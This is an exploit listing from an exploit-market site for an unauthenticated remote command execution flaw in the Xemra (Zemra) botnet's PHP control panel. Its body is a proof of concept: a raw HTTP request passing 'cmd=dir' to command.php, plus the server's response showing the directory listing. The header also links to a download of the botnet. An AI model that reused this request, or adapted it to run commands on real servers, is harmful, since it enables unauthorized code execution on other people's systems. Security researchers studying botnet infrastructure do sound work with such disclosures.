[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Xemra Botnet Remote Code Execution

Author
GalaxyAndroid2
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-21663
Category
remote exploits
Date add
14-12-2013
Platform
php
##########################################################################
# Exploit Title: Xemra Botnet Remote Code Execution Vulnerability
# Date: 13.12.2013
# Exploit Author: GalaxyAndroid
# Vendor Homepage: unkn0wn
# Software Link: http://www.hackreports.com/2012/07/download-zemra-botnet-ddos-attack.html
# Version: unknown
# Tested on: Windows 7 with Xampp
# greets goes to: ChrisKSK, Protestants in Ukraine -> keep pushing!
# no greets to: NSA, GCHQ, USA, AUS, CAN, GBR, NZL
#################################Exploit-Code###################################

PoC execute dir Command. No authentication needed!

#########
GET http://127.0.0.1/xemra/system/command.php?cmd=dir HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cache-Control: max-age=0
############

Response:

HTTP/1.1 200 OK
Date: Fri, 13 Dec 2013 18:29:42 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
X-Powered-By: PHP/5.2.8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 685

<h1>cmd</h1><pre> Datenträger in Laufwerk C: ist 


 Verzeichnis von C:\xampp\htdocs\xemra\system

13.12.2013  19:16    <DIR>          .
13.12.2013  19:16    <DIR>          ..
18.04.2012  22:09               646 base.class.php
26.11.2011  13:47                88 command.php
18.05.2012  08:11               277 config.include.php
18.04.2012  22:09             1.348 database.class.php
13.12.2013  19:16    <DIR>          geoip
18.04.2012  22:09               694 global.php
18.04.2012  22:09             1.725 session.class.php
               6 Datei(en),          4.778 Bytes
               3 Verzeichnis(se), 66.773.762.048 Bytes frei

#  0day.today [2024-11-15]  #